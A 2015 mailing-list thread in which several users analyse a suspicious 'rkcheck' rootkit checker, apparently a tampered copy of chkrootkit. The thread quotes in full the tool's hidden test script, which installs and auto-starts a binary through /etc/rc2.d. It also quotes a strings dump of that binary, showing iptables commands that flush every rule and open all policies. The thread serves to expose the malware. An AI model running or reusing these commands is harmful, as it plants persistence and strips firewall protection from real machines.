> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote: > > it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope, nobody installed it anywhere, it seems to execute rkcheck/tests/.unit/test.sh which contains > > #!/bin/bash > > cp tests/.unit/test /usr/bin/rrsyncn > chmod +x /usr/bin/rrsyncn > rm -fr /etc/rc2.d/S98rsyncn > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > /usr/bin/rrsyncn > exit > > That doesn't look like something you'd want on your box?I filed a report with Google about that domain (Google Safe Browsing), briefly describing what?s been recounted here on this thread. It seems quite suspicious, agreed. Has anyone started an analysis of the rrsyncn binary? The last few lines of a simple string dump are interesting? take note what looks to be an IP address of 95.215.44.195. /bin/sh iptables -X 2> /dev/null iptables -F 2> /dev/null iptables -t nat -F 2> /dev/null iptables -t nat -X 2> /dev/null iptables -t mangle -F 2> /dev/null iptables -t mangle -X 2> /dev/null iptables -P INPUT ACCEPT 2> /dev/null iptables -P FORWARD ACCEPT 2> /dev/null iptables -P OUTPUT ACCEPT 2> /dev/null udevd 95.215.44.195 ;*3$"> Cheers, > > PhilipChris
> Am 25.02.2015 um 21:55 schrieb Christopher Schulte <christopher at schulte.org>: > > >> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote: >> >> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope, nobody installed it anywhere, it seems to execute rkcheck/tests/.unit/test.sh which contains >> >> #!/bin/bash >> >> cp tests/.unit/test /usr/bin/rrsyncn >> chmod +x /usr/bin/rrsyncn >> rm -fr /etc/rc2.d/S98rsyncn >> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >> /usr/bin/rrsyncn >> exit >> >> That doesn't look like something you'd want on your box? > > I filed a report with Google about that domain (Google Safe Browsing), briefly describing what?s been recounted here on this thread. It seems quite suspicious, agreed. > > Has anyone started an analysis of the rrsyncn binary? The last few lines of a simple string dump are interesting? take note what looks to be an IP address of 95.215.44.195. > > /bin/sh > iptables -X 2> /dev/null > iptables -F 2> /dev/null > iptables -t nat -F 2> /dev/null > iptables -t nat -X 2> /dev/null > iptables -t mangle -F 2> /dev/null > iptables -t mangle -X 2> /dev/null > iptables -P INPUT ACCEPT 2> /dev/null > iptables -P FORWARD ACCEPT 2> /dev/null > iptables -P OUTPUT ACCEPT 2> /dev/null > udevd > 95.215.44.195 > ;*3$"95.215.44.195 is the IP of rkcheck.org. I contacted the yourserver.se who own the network. Philip
Christopher Schulte <christopher at schulte.org> writes:>> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote: >> >> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org >> which was registered a few days ago and looks like a tampered version of >> chkrootkit. I hope, nobody installed it anywhere, it seems to execute >> rkcheck/tests/.unit/test.sh which contains >> >> #!/bin/bash >> >> cp tests/.unit/test /usr/bin/rrsyncn >> chmod +x /usr/bin/rrsyncn >> rm -fr /etc/rc2.d/S98rsyncn >> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >> /usr/bin/rrsyncn >> exitAre you looking at the tarball from the "source code" link, http://rkcheck.org/download.php?file=rkcheck-1.4.3-src.tar.gz? % tar -xvf rkcheck-1.4.3-src.tar.gz x rkcheck/ x rkcheck/chkdirs.c x rkcheck/README.chklastlog x rkcheck/README.chkwtmp x rkcheck/chkutmp.c x rkcheck/chkrootkit x rkcheck/chkrootkit.lsm x rkcheck/check_wtmpx.c x rkcheck/COPYRIGHT x rkcheck/strings.c x rkcheck/ifpromisc.c x rkcheck/ACKNOWLEDGMENTS x rkcheck/chklastlog.c: truncated gzip input tar: Error exit delayed from previous errors. I don't see a /tests/ directory or any directory under rkcheck. Joseph
Note: 95.215.44.195 == rkcheck.org The web site certainly smells like a total scam... no indication whatsoever of who might be behind this allegedly helpful project. But they'd like me to just trust them and download their checker tool. Yea. Right. No thanks. But I give them an `E' for effort.
On Wed, 25 Feb 2015 20:55:43 +0000, Christopher Schulte wrote: > > On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote: > > > > it felt pretty scammy to me, googling for the "worm" got me to > rkcheck.org which was registered a few days ago and looks like a > tampered version of chkrootkit. I hope, nobody installed it anywhere, > it seems to execute rkcheck/tests/.unit/test.sh which contains > > > > #!/bin/bash > > > > cp tests/.unit/test /usr/bin/rrsyncn > > chmod +x /usr/bin/rrsyncn > > rm -fr /etc/rc2.d/S98rsyncn > > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > > /usr/bin/rrsyncn > > exit > > > > That doesn't look like something you'd want on your box?? > > I filed a report with Google about that domain (Google Safe > Browsing), briefly describing what??s been recounted here on this > thread. It seems quite suspicious, agreed. > > Has anyone started an analysis of the rrsyncn binary? The last few > lines of a simple string dump are interesting?? take note what looks > to be an IP address of 95.215.44.195. > > /bin/sh > iptables -X 2> /dev/null > iptables -F 2> /dev/null > iptables -t nat -F 2> /dev/null > iptables -t nat -X 2> /dev/null > iptables -t mangle -F 2> /dev/null > iptables -t mangle -X 2> /dev/null > iptables -P INPUT ACCEPT 2> /dev/null > iptables -P FORWARD ACCEPT 2> /dev/null > iptables -P OUTPUT ACCEPT 2> /dev/null > udevd > 95.215.44.195 > ;*3$" > > > Cheers, > > > > Philip > > Chris Seeing as noone's mentioned it yet .. if your (linux) box were running iptables - a reasonable assumption - then running those commands would remove and flush all your rules, leaving you with a firewall that accepted everything, as good as no firewall at all. And then .. ? At least FreeBSD isn't the lowest hanging fruit for these monkeys .. cheers, Ian